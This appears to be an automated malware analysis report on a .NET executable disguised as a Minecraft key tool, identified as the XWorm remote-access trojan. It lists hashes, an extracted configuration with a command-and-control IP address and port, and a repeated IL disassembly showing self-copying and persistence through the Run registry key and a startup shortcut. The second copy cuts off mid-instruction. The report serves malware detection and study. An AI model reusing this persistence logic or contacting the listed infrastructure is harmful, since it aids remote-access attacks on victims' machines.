2b7e97eefc289f848e49c5e705f00d48
PE Executable | MD5: 2b7e97eefc289f848e49c5e705f00d48 | Size: 62.98 KB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 2b7e97eefc289f848e49c5e705f00d48
|
| Sha1 | ec2c738afecb6005645abee2251bbf2fd5438981
|
| Sha256 | 979ee9cde008e6a19bad8b4e71462cb4fae000ae625c8e942e17fdd131144c9b
|
| Sha384 | c62f27d9b557f1d53998712cc1bc75cbae9a42fbc2bff79f60c5d50ec379c86515a8b2cb9f997e9c9749b8b6ae298dfe
|
| Sha512 | 69293a3ba696545da465e4944479746a107802ae304c5abbd14a63ba6c2de1ca5272d9adf736406b9c6da5107b6adf375a0b13c25b257e3231188b7642d48275
|
| SSDeep | 1536:e9/8tCk3bbO2kb179dFpBdkbWCcQhybB+0O6NOldzX:h3m2kbnfprkbWVtFmUOldzX
|
| TLSH | 0D536B1877F64125E1FE6FB05EF17293D676F2635803A66F24C8028B1713A88CD916FA
|
PeID
|
Config. Field0 | Value |
|---|---|
| Mutex | vK2M0Gf3vtG7zcCz |
| Hosts | 193.222.99.44 |
| Port | 6000 |
| KEY | <666666> |
| USBNM | <XWormmm> |
| family | xworm |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | MINECRAFT-KEY-GLOBAL.exe |
| Full Name | MINECRAFT-KEY-GLOBAL.exe |
| EntryPoint | System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::abHImNBVORHxfM8dzSYg15tyreCfFzg0DOaLlm8MMjAtWz5oa79rOl79nJdMfnKTOFWJiB51aTDScqeUf0u() |
| Scope Name | MINECRAFT-KEY-GLOBAL.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | MINECRAFT-KEY-GLOBAL |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 260 |
| Main Method | System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::abHImNBVORHxfM8dzSYg15tyreCfFzg0DOaLlm8MMjAtWz5oa79rOl79nJdMfnKTOFWJiB51aTDScqeUf0u() |
| Main IL Instruction Count | 228 |
| Main IL | ldsfld System.Int32 EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::wTjQCWSkCUklVlSQvCXIsMEizI9Njq41pRj2w0QBvQeoLoZcBxbwDEV4ATyMPpAJUMA2USgyd0dFaOr64dN ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::74CLE45sl9U2Pl9XMhuOZHEkNSrifvWM4eSyIBNALtHxFYAxLQ4cJDSm7YvwDWGvTBWT167wI6ta6Bk2mlV call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::74CLE45sl9U2Pl9XMhuOZHEkNSrifvWM4eSyIBNALtHxFYAxLQ4cJDSm7YvwDWGvTBWT167wI6ta6Bk2mlV ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::61In9zZNuKQsv5f2zBn49hadagCULnGTzcj2PvfvpJTNO54xejNcocOxRnTGSTmGTQ0j7orjnYFUikvn2jh call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::61In9zZNuKQsv5f2zBn49hadagCULnGTzcj2PvfvpJTNO54xejNcocOxRnTGSTmGTQ0j7orjnYFUikvn2jh ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Qj5tEczUq2eP6D4Y6D3X4sWFxt9vYOsBZyrmUwvqxUWSrAJT0XOUbpcShwBx1Eu2nTZbv1WVM2rUEAQJW5n call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Qj5tEczUq2eP6D4Y6D3X4sWFxt9vYOsBZyrmUwvqxUWSrAJT0XOUbpcShwBx1Eu2nTZbv1WVM2rUEAQJW5n ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::G2WrKdDnSOwPWfERTdkiXYeABAQ6KNvQH7WtcNFMz4iKR6dR8Tro4RXDBI30TBP20XtSPj9VfVPclOCXz2t call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::G2WrKdDnSOwPWfERTdkiXYeABAQ6KNvQH7WtcNFMz4iKR6dR8Tro4RXDBI30TBP20XtSPj9VfVPclOCXz2t ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::2HvPOwitS4sAMRqn8NI25LstzjVW2nDgHKdCTttvXr0429aBf6Ial1WGn1wPqwXJGyJyKxNiSKNrycEhtTJ call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::2HvPOwitS4sAMRqn8NI25LstzjVW2nDgHKdCTttvXr0429aBf6Ial1WGn1wPqwXJGyJyKxNiSKNrycEhtTJ ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Ocyh1nXffwVRU2089WVl8zV93cv4wA41RrmzjMnrXJSNTi9ysdu2p0JpimPCM25QA74mjTQVQpLzFLOqKD5 call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Ocyh1nXffwVRU2089WVl8zV93cv4wA41RrmzjMnrXJSNTi9ysdu2p0JpimPCM25QA74mjTQVQpLzFLOqKD5 ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ leave.s IL_00CB: call System.Boolean Stub.4Sz4vsHCv1p576ZjZSafQbcmC::mtnNeY3lX9YEQB2qtqka8UUaF() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.4Sz4vsHCv1p576ZjZSafQbcmC::mtnNeY3lX9YEQB2qtqka8UUaF() call System.Boolean Stub.4Sz4vsHCv1p576ZjZSafQbcmC::mtnNeY3lX9YEQB2qtqka8UUaF() brtrue.s IL_00D8: ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A ldstr \ ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_011A: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0131: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.4Sz4vsHCv1p576ZjZSafQbcmC::BcVC03IXsPZrCmwFQsX7hjXLB call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_015C: call My.FcNZLwMYqvlXUkt1YZVYKXKoiSvJuRvhA0ZoMewSdej1McwyQT5BNDwibJr4xrp5rWp89HDjA7nJyKwblDe My.0hEz9n9lHRPjCxfkBas3dT4TAy9KyaI1k0WKju6vytNMFdqRzjl3WvXv6K3hAUTKWV4uNEnPa0APQ0K76LM::oNkR91BX9Pph48Rc9p8SlGfqDgvzAfYVI42COY0EMAYQWs5VbDzj19IAli9NbqkGSkZdRHnDCbjnamno8O0() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_015C: call My.FcNZLwMYqvlXUkt1YZVYKXKoiSvJuRvhA0ZoMewSdej1McwyQT5BNDwibJr4xrp5rWp89HDjA7nJyKwblDe My.0hEz9n9lHRPjCxfkBas3dT4TAy9KyaI1k0WKju6vytNMFdqRzjl3WvXv6K3hAUTKWV4uNEnPa0APQ0K76LM::oNkR91BX9Pph48Rc9p8SlGfqDgvzAfYVI42COY0EMAYQWs5VbDzj19IAli9NbqkGSkZdRHnDCbjnamno8O0() call My.FcNZLwMYqvlXUkt1YZVYKXKoiSvJuRvhA0ZoMewSdej1McwyQT5BNDwibJr4xrp5rWp89HDjA7nJyKwblDe My.0hEz9n9lHRPjCxfkBas3dT4TAy9KyaI1k0WKju6vytNMFdqRzjl3WvXv6K3hAUTKWV4uNEnPa0APQ0K76LM::oNkR91BX9Pph48Rc9p8SlGfqDgvzAfYVI42COY0EMAYQWs5VbDzj19IAli9NbqkGSkZdRHnDCbjnamno8O0() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_0197: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0197: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_8 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_10 ldloc.s V_10 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_10 stloc.s V_11 ldloc.s V_11 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_12 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_12 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_021C: stloc.s V_13 ldloc.s V_11 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_8 stloc.s V_13 ldloc.s V_13 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_13 ldloc.s V_8 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.4Sz4vsHCv1p576ZjZSafQbcmC::pBbScnbyxIPKiQqRtCrIBFSCe leave.s IL_029B: call System.Void Stub.4Sz4vsHCv1p576ZjZSafQbcmC::gD5QanltHqyUakKap3E2SjznX() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_029B: call System.Void Stub.4Sz4vsHCv1p576ZjZSafQbcmC::gD5QanltHqyUakKap3E2SjznX() call System.Void Stub.4Sz4vsHCv1p576ZjZSafQbcmC::gD5QanltHqyUakKap3E2SjznX() call System.String Stub.MhfeJAxfC3Y7g7tKIcFCqPi5SMfzdWwnyxWJSQi4hSNwGKdzg8imslLIPKVNAEJuPSpicOEZN5Fk2P2Q5rA::IPvPrHy0e9JJ31R3qWQlGK12X4gV8XlXB2pQdIRMRXqZ3ZQF4eqDmTyFv6pnZfzQyRWaqT7dHc37WNDhuj8() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02B1: ldnull call System.Void Stub.T5LrbuiJ9Nz5Q2Dvixnz7glN0::IV8wof46tY5pduoIL8uNZRfuX() ldnull <null> ldftn System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::etAY1gQWcq4jayIbUBQ5ChnhdNmRySXVt7fyPa6p0q0WEIydHTUwrNIIgRx7p03MnzhkSPhCkAggHYfpczS() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::DSXCvzHGWAeGzetjyrBwSVmKEXxAovyPruU5giwilMrFuSV1aKViEzISHulUNSoaL0Db8on4GeHUqdoXpfv() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
| Module Name | MINECRAFT-KEY-GLOBAL.exe |
| Full Name | MINECRAFT-KEY-GLOBAL.exe |
| EntryPoint | System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::abHImNBVORHxfM8dzSYg15tyreCfFzg0DOaLlm8MMjAtWz5oa79rOl79nJdMfnKTOFWJiB51aTDScqeUf0u() |
| Scope Name | MINECRAFT-KEY-GLOBAL.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | MINECRAFT-KEY-GLOBAL |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 260 |
| Main Method | System.Void Stub.NWgjTmgnrix9BZTa3XyMFeLjypyXcgCPg8sdc3K1HN3Qd0xtDymoxkAEg8dHgTU8PqZG0biZYKYohQ0jsRm::abHImNBVORHxfM8dzSYg15tyreCfFzg0DOaLlm8MMjAtWz5oa79rOl79nJdMfnKTOFWJiB51aTDScqeUf0u() |
| Main IL Instruction Count | 228 |
| Main IL | ldsfld System.Int32 EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::wTjQCWSkCUklVlSQvCXIsMEizI9Njq41pRj2w0QBvQeoLoZcBxbwDEV4ATyMPpAJUMA2USgyd0dFaOr64dN ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::74CLE45sl9U2Pl9XMhuOZHEkNSrifvWM4eSyIBNALtHxFYAxLQ4cJDSm7YvwDWGvTBWT167wI6ta6Bk2mlV call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::74CLE45sl9U2Pl9XMhuOZHEkNSrifvWM4eSyIBNALtHxFYAxLQ4cJDSm7YvwDWGvTBWT167wI6ta6Bk2mlV ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::61In9zZNuKQsv5f2zBn49hadagCULnGTzcj2PvfvpJTNO54xejNcocOxRnTGSTmGTQ0j7orjnYFUikvn2jh call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::61In9zZNuKQsv5f2zBn49hadagCULnGTzcj2PvfvpJTNO54xejNcocOxRnTGSTmGTQ0j7orjnYFUikvn2jh ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Qj5tEczUq2eP6D4Y6D3X4sWFxt9vYOsBZyrmUwvqxUWSrAJT0XOUbpcShwBx1Eu2nTZbv1WVM2rUEAQJW5n call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Qj5tEczUq2eP6D4Y6D3X4sWFxt9vYOsBZyrmUwvqxUWSrAJT0XOUbpcShwBx1Eu2nTZbv1WVM2rUEAQJW5n ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::G2WrKdDnSOwPWfERTdkiXYeABAQ6KNvQH7WtcNFMz4iKR6dR8Tro4RXDBI30TBP20XtSPj9VfVPclOCXz2t call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::G2WrKdDnSOwPWfERTdkiXYeABAQ6KNvQH7WtcNFMz4iKR6dR8Tro4RXDBI30TBP20XtSPj9VfVPclOCXz2t ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::2HvPOwitS4sAMRqn8NI25LstzjVW2nDgHKdCTttvXr0429aBf6Ial1WGn1wPqwXJGyJyKxNiSKNrycEhtTJ call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::2HvPOwitS4sAMRqn8NI25LstzjVW2nDgHKdCTttvXr0429aBf6Ial1WGn1wPqwXJGyJyKxNiSKNrycEhtTJ ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Ocyh1nXffwVRU2089WVl8zV93cv4wA41RrmzjMnrXJSNTi9ysdu2p0JpimPCM25QA74mjTQVQpLzFLOqKD5 call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::Ocyh1nXffwVRU2089WVl8zV93cv4wA41RrmzjMnrXJSNTi9ysdu2p0JpimPCM25QA74mjTQVQpLzFLOqKD5 ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::IxJ02ycmjbLXwdufQ06w25Odp4VT0zieodSNqTKyKDUIVQYmycG9s8JgHmdbAGbnuEnUkwq2Um7hQk9Zj0A ldsfld System.String EVWuefdE2LNCgqeKoyW8FZMgQ4fU9xpZhz0xEA1eHb9Gy980HImun6zS1vGqaxSPNXTov9GjYL2Ku9srPxL::HGRLc49CTTTPC41pwnOoS7s1imtozRjptFZyjhSnQepcRihbjH61AofvpMJeEfXAze9q4X7LzKupX70QmfZ call System.Object Stub.qIzpcY4qxplG2MC5KQxrnqhxd::yg3h7Rs0jS31rU3O5PHeAQ76q(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 